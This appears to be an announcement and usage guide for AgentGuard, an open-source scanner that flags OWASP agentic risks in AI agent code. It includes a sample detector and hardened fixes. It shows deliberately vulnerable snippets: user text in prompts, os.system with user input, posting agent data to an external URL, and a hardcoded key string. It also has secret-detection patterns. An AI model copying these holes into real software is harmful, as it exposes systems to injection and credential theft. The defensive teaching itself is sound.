# AgentGuard: Open-Source Security Scanning for AI Agent Code

Dockfix Labs released AgentGuard, an open-source static analysis tool that scans AI agent codebases for all 10 OWASP Agentic Security Initiative risks, including prompt injection, tool abuse, and data exfiltration. The tool can be integrated into CI/CD pipelines and supports SARIF output for GitHub code scanning, as well as a Model Context Protocol server for real-time scanning in AI coding assistants.

## The Problem

AI agents are being deployed at scale — in customer support, code generation, data analysis, and autonomous workflows. But the code that powers these agents is rarely security-audited. Consider this pattern, common in production agent codebases:

```python
from flask import request  # request object of the web framework handling the call
import openai

# Vulnerable: untrusted request data is formatted into the instruction string
user_input = request.json["prompt"]
prompt = f"You are a helpful assistant. {user_input}"
response = openai.chat.completions.create(
    model="gpt-4",
    messages=[{"role": "user", "content": prompt}],
)
```

This is a prompt injection vulnerability. A user can override the system prompt and manipulate the agent's behavior. It is the AI equivalent of SQL injection — and it is everywhere.

The [OWASP Agentic Security Initiative](https://owasp.org/www-project-agentic-security/) published a Top 10 list of risks specific to AI agent systems:

| ID | Risk |
|---|---|
| ASI01 | Prompt Injection |
| ASI02 | Tool Abuse / Unintended Tool Use |
| ASI03 | Data Exfiltration / Sensitive Data Leakage |
| ASI04 | Unauthorized Actions / Excessive Agency |
| ASI05 | Supply Chain / Untrusted Components |
| ASI06 | Insecure Output Handling |
| ASI07 | Credential / Secret Exposure |
| ASI08 | Context Window Manipulation |
| ASI09 | Agent Loop Exploitation |
| ASI10 | Trust Boundary Violation |

Most of these have no coverage in traditional SAST tools. Semgrep and CodeQL were built for a world without LLMs.

## AgentGuard

[AgentGuard](https://github.com/dockfixlabs/agentguard) is an open-source static analysis tool that scans AI agent codebases for all 10 OWASP ASI categories.
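To make concrete what a static check for these categories looks like, here is a small AST-based scanner. It is an added illustration written for this article, not AgentGuard's code: it walks Python source, applies a flow-insensitive taint heuristic (names assigned from f-strings, `+` concatenation or `str.format()`), and reports dynamic prompts reaching an LLM call (ASI01), non-literal arguments to shell or `eval` sinks (ASI02), outbound HTTP to hardcoded URLs (ASI03) and a few credential prefixes matched by regex (ASI07). The call tables, regexes and the embedded `SAMPLE_SOURCE` are constructed assumptions for the example; the rule names follow the ASI numbering.

```python
"""Minimal AST-based scanner for a few OWASP ASI patterns (illustrative, not AgentGuard's code)."""
import ast
import re
from typing import List, NamedTuple, Set

# Constructed sample of agent code, embedded so the example runs offline.
SAMPLE_SOURCE = '''
import os
import requests
import openai

OPENAI_API_KEY = "sk-proj-EXAMPLEEXAMPLEEXAMPLEEXAMPLEEXAMPLE"  # constructed, not a real key

def run_command(query):
    return os.system(f"echo {query}")

def answer(user_input):
    prompt = f"You are a helpful assistant. {user_input}"
    return openai.chat.completions.create(
        model="gpt-4",
        messages=[{"role": "user", "content": prompt}],
    )

def report(agent_data):
    requests.post("https://example.com/collect", json=agent_data)
'''


class Finding(NamedTuple):
    rule: str
    line: int
    detail: str


# Heuristic rule tables (assumptions for this example; a real rule set is far larger).
DANGEROUS_CALLS = {"os.system", "subprocess.run", "subprocess.call", "subprocess.Popen", "eval", "exec"}
EXFIL_CALLS = {"requests.post", "requests.put"}
LLM_CALL_SUFFIXES = ("chat.completions.create", "messages.create")
SECRET_PATTERNS = {
    "OpenAI project key": re.compile(r"sk-proj-[A-Za-z0-9_-]{20,}"),
    "AWS access key id": re.compile(r"AKIA[0-9A-Z]{16}"),
    "GitHub PAT": re.compile(r"ghp_[A-Za-z0-9]{36}"),
}


def _dotted_name(func: ast.expr) -> str:
    """Turn the callee of a Call into 'a.b.c' where possible ('' otherwise)."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return ""


def _is_dynamic_string(node: ast.AST) -> bool:
    """f-string with interpolation, '+' concatenation, or str.format(): user data may flow in."""
    if isinstance(node, ast.JoinedStr):
        return any(isinstance(v, ast.FormattedValue) for v in node.values)
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        return True
    return isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute) and node.func.attr == "format"


def _tainted_names(tree: ast.AST) -> Set[str]:
    """Names assigned from dynamically built strings (simple, flow-insensitive taint)."""
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and len(node.targets) == 1 and isinstance(node.targets[0], ast.Name):
            if _is_dynamic_string(node.value):
                names.add(node.targets[0].id)
    return names


def _uses_taint(node: ast.AST, tainted: Set[str]) -> bool:
    """True if the subtree references a tainted name or builds a string dynamically."""
    return any((isinstance(n, ast.Name) and n.id in tainted) or _is_dynamic_string(n) for n in ast.walk(node))


def scan_source(source: str) -> List[Finding]:
    findings = []
    # ASI07: regex over the raw text, so secrets in comments and strings are caught alike.
    for lineno, text in enumerate(source.splitlines(), 1):
        for label, pattern in SECRET_PATTERNS.items():
            if pattern.search(text):
                findings.append(Finding("ASI07-CREDENTIAL-LEAK", lineno, f"hardcoded {label}"))
    tree = ast.parse(source)
    tainted = _tainted_names(tree)
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name.endswith(LLM_CALL_SUFFIXES):
            # ASI01: user-controlled text built into the messages of an LLM call.
            for kw in node.keywords:
                if kw.arg == "messages" and _uses_taint(kw.value, tainted):
                    findings.append(Finding("ASI01-PROMPT-INJECTION", node.lineno, f"dynamic prompt passed to {name}"))
        elif name in DANGEROUS_CALLS:
            # ASI02: shell/eval sink receiving a non-literal argument.
            if any(not isinstance(a, ast.Constant) for a in node.args):
                findings.append(Finding("ASI02-TOOL-ABUSE", node.lineno, f"non-literal argument to {name}"))
        elif name in EXFIL_CALLS:
            # ASI03: outbound HTTP to a hardcoded external URL.
            if node.args and isinstance(node.args[0], ast.Constant) and str(node.args[0].value).startswith("http"):
                findings.append(Finding("ASI03-DATA-EXFIL", node.lineno, f"{name} to {node.args[0].value}"))
    return sorted(findings, key=lambda f: f.line)


if __name__ == "__main__":
    for f in scan_source(SAMPLE_SOURCE):
        print(f"line {f.line}: {f.rule} ({f.detail})")
```

Run against the embedded sample it reports one finding per category in line order (ASI07 on the key, ASI02 on `os.system`, ASI01 on the completions call, ASI03 on `requests.post`), and nothing for a literal `os.system('ls')`. The taint step is deliberately crude: it neither follows data across functions nor distinguishes a user-supplied string from a trusted one, which is exactly the source of false positives a production tool has to engineer away.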
## Installation

```bash
pip install dfx-agentguard

# Scan current directory
agentguard .

# JSON output for CI/CD
agentguard src/ --format json

# SARIF for GitHub code scanning
agentguard . --format sarif
```

## What It Detects

### Prompt Injection (ASI01)

f-string prompt construction, string concatenation with user input, system prompt overrides.

```python
# Vulnerable
prompt = f"You are a helpful assistant. {user_input}"
```

AgentGuard flags this as `ASI01-PROMPT-INJECTION`.

### Tool Abuse (ASI02)

`os.system`, `subprocess` with user input, `eval`/`exec` in agent tool functions.

```python
# Vulnerable
def run_command(query):
    return os.system(f"echo {query}")
```

AgentGuard flags this as `ASI02-TOOL-ABUSE`.

### Data Exfiltration (ASI03)

`requests.post` to external URLs, `fetch` calls, webhook configurations, DNS-based exfiltration patterns, subprocess `curl`/`wget` calls.

```python
# Vulnerable
requests.post("https://analytics-server.com/collect", json=agent_data)
```

AgentGuard flags this as `ASI03-DATA-EXFIL`.

### Credential Exposure (ASI07)

Hardcoded API keys (`sk-proj-`, `AKIA`, `ghp_`), private keys, connection strings with passwords, wallet seed phrases, Slack tokens, Google API keys.

```python
# Vulnerable
OPENAI_API_KEY = "sk-proj-Tq8m2X4vN7bR1wK9pL3hY6jD5cF0aZ8s"
```

AgentGuard flags this as `ASI07-CREDENTIAL-LEAK`.

Plus: Excessive Agency (ASI04), Supply Chain (ASI05), Insecure Output Handling (ASI06), Context Manipulation (ASI08), Agent Loop Exploitation (ASI09), Trust Boundary Violations (ASI10).

## CI/CD Integration

```bash
agentguard . --format text
agentguard . --format json --exit-code
agentguard . --format sarif
```

`.pre-commit-config.yaml`:

```yaml
repos:
  - repo: https://github.com/dockfixlabs/agentguard
    rev: v0.2.2
    hooks:
      - id: agentguard
```

`.github/workflows/security.yml`:

```yaml
name: Agent Security Scan
on: pull_request
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: dockfixlabs/agentguard@v0.2.2
        with:
          path: src/
          format: sarif
```

## MCP Server

AgentGuard can run as a Model Context Protocol server, letting AI coding assistants (Claude Code, Cursor) scan code in real time:

```bash
agentguard --mcp
```

## VS Code Extension

Inline diagnostics, scan-on-save, and a findings tree view.
Available as a VSIX on the [releases page](https://github.com/dockfixlabs/agentguard-vscode/releases).

## Benchmark

The [AgentGuard Benchmark](https://github.com/dockfixlabs/agentguard-benchmark) provides 28 vulnerable code samples across 5 OWASP ASI categories, plus clean code for false-positive testing.

```bash
git clone https://github.com/dockfixlabs/agentguard-benchmark
cd agentguard-benchmark
python benchmark.py
```

## Roadmap

Full roadmap on [GitHub](https://github.com/dockfixlabs/agentguard/blob/main/ROADMAP.md).

## Repositories

| Repository | Description |
|---|---|

## Get Started

```bash
pip install dfx-agentguard
agentguard . --format text
```

If you find this useful, star the repo on [GitHub](https://github.com/dockfixlabs/agentguard). Contributions welcome — see [CONTRIBUTING.md](https://github.com/dockfixlabs/agentguard/blob/main/CONTRIBUTING.md).

AgentGuard is MIT-licensed and built by Dockfix Labs.
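A finding is only useful if the fix is clear, so here are hardened counterparts to the two patterns this post flags most often, the ASI01 f-string prompt and the ASI02 `os.system` tool. This is an added example written for this article, not AgentGuard's code: the instruction text stays in a constant and the user text travels in its own message role; tool execution goes through an allowlist with fixed arity and an argv list with no shell, so metacharacters in user text are passed literally. `SYSTEM_PROMPT`, `MAX_USER_CHARS`, `ALLOWED_TOOLS` and the function names are assumptions for the example.

```python
"""Hardened counterparts to the ASI01/ASI02 patterns (added example, not AgentGuard code)."""
import subprocess
from typing import Dict, List

# Instructions live in a constant the user can never write into.
SYSTEM_PROMPT = "You are a helpful assistant."
MAX_USER_CHARS = 4000  # assumed input budget; tune per model and use case


def build_messages(user_input: str) -> List[Dict[str, str]]:
    """ASI01 mitigation: keep instructions and user data in separate roles.

    The user text is passed as data in its own message, never formatted into
    the system prompt, and bounded in size so it cannot crowd out the context.
    """
    if len(user_input) > MAX_USER_CHARS:
        raise ValueError("user input exceeds size budget")
    return [
        {"role": "system", "content": SYSTEM_PROMPT},
        {"role": "user", "content": user_input},
    ]


# Tool allowlist: the agent may only invoke these executables, each with a fixed argument count.
ALLOWED_TOOLS = {"echo": 1, "date": 0}


def run_tool(tool: str, *args: str) -> str:
    """ASI02 mitigation: allowlisted executable, fixed arity, argv list, no shell."""
    if tool not in ALLOWED_TOOLS:
        raise PermissionError(f"tool not allowed: {tool}")
    if len(args) != ALLOWED_TOOLS[tool]:
        raise ValueError(f"{tool} expects {ALLOWED_TOOLS[tool]} argument(s)")
    # shell=False (the default): args reach the program as argv entries, so shell
    # metacharacters in user text are literal bytes, not commands.
    result = subprocess.run([tool, *args], capture_output=True, text=True, check=True, timeout=5)
    return result.stdout


if __name__ == "__main__":
    print(build_messages("Summarise the attached report."))
    print(run_tool("echo", "hello; ls"))
```

With the argv form, `run_tool("echo", "hello; ls")` prints the literal string `hello; ls` instead of running a second command, and any executable outside the allowlist is refused before `subprocess` is reached. Both of the flagged patterns from the post reduce to the same rule: user text is data, and data must never be spliced into the channel that carries instructions, whether that channel is a system prompt or a shell command line.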